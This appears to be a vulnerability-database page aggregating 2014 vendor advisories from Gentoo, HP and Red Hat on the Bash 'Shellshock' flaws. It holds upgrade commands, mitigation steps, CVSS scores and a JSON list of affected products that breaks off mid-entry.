# emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0"
All Bash 4.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1"
All Bash 4.2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52"
References
[ 1 ] CVE-2014-6277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277 [ 2 ] CVE-2014-6278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278 [ 3 ] CVE-2014-7186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186 [ 4 ] CVE-2014-7187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201410-01.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04487573
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04487573 Version: 1
HPSBST03155 rev.1 - HP StoreFabric H-series switches running Bash Shell, Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-11-11 Last Updated: 2014-11-11
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP StoreFabric H-series switches running Bash Shell.
References:
CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 SSRT101747
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. All HP StoreFabric H-series switches
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP is actively working on a firmware update to resolve the vulnerability in HP StoreFabric H-series switches. This bulletin will be revised when the update is available.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this
vulnerability:
- Place the HP StoreFabric H-series switch and other data center
critical infrastructure behind a firewall to disallow access from the Internet. - Change all HP StoreFabric switch default account passwords, including the root passwords, from the default factory passwords. - Examine the list of accounts, including ones on the switch and those existing on remote authentication servers such as RADIUS, LDAP, and TACAS+, to ensure only necessary personnel can gain access to HP StoreFabric H-series switches. Delete guest accounts and temporary accounts created for one-time usage needs. - To avoid possible exploit through the embedded web GUI, QuickTools, disable the web server with the following procedure:
NOTE: After completing this procedure, the user will not be able to
manage the switch using QuickTools. Login to the Command Line Interface (CLI). Execute the "admin start" command to enter into an admin session. Execute the "set setup services" command and change setting for EmbeddedGUIEnabled to "False".
HISTORY Version:1 (rev.1) - 11 November 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice.
Note: HP and the switch vendor recommend running an active version of Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge (SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around information provided in the MITIGATION INFORMATION section below to protect HP StoreFabric B-series switches from this vulnerability. - Utilize FOS password policy management to strengthen the complexity, age, and history requirements of switch account passwords. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: rhev-hypervisor6 security update Advisory ID: RHSA-2014:1354-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html Issue date: 2014-10-02 CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 =====================================================================
- Summary:
An updated rhev-hypervisor6 package that fixes several security issues is now available.
Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
RHEV-M 3.4 - noarch
- Description:
The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-6271)
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169)
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. (CVE-2014-1568)
It was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186)
An off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. (CVE-2014-7187)
Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568.
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package. Package List:
RHEV-M 3.4:
Source: rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm
noarch: rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-1568.html https://www.redhat.com/security/data/cve/CVE-2014-6271.html https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#critical
8
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-1147", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.7" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "2.01" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "2.0" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.4" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.1" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.0" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.6" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.2" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.3" }, { "model": "bash", "scope": "eq", "trust": 1.6, "vendor": "gnu", "version": "1.14.5" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2.48" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.0" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "3.2" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.1" }, { "model": "bash", "scope": "eq", "trust": 1.3, "vendor": "gnu", "version": "4.3" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.01.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0.16" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.02.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.0" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "3.1" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.05" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.03" }, { "model": "bash", "scope": "eq", "trust": 1.0, "vendor": "gnu", "version": "2.04" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.9, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "avaya", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "barracuda", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "blue coat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "centos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "check point", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cygwin", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "d link", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell computer", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "extreme", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fedora", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fireeye", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gnu bash", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "gentoo linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "juniper", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mageia", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "mcafee", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "monroe", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "niksun", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "netapp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "novell", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "palo alto", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "qnap security", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "suse linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "slackware linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "trend micro", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "vmware", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "xirrus", "version": null }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unified contact center express", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "manageone v100r002c20", "scope": null, "trust": 0.6, "vendor": "huawei", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.924.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.1" }, { "model": "oceanstor s5300 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.31" }, { "model": "ucs invicta appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secureplatform r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1012" }, { "model": "manageone v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch220 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.42" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1039" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "gaia embedded r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.434.0" }, { "model": "telepresence manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.365.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.879.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.74" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.92" }, { "model": "protectier appliance edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.926.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.47255" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.39" }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.530.0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.58" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.122" }, { "model": "key vault", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.59" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.57" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudsystem enterprise software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.2" }, { "model": "oceanstor dorado g2 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.633.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "download server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.769.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.127" }, { "model": "gaia embedded r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.785.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.225" }, { "model": "secureplatform r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.385.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.319.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.908.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.62" }, { "model": "oceanstor s5600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.374.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.52" }, { "model": "secureplatform r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.86" }, { "model": "secureplatform r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.40" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1043" }, { "model": "rack server rh2288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.8" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, 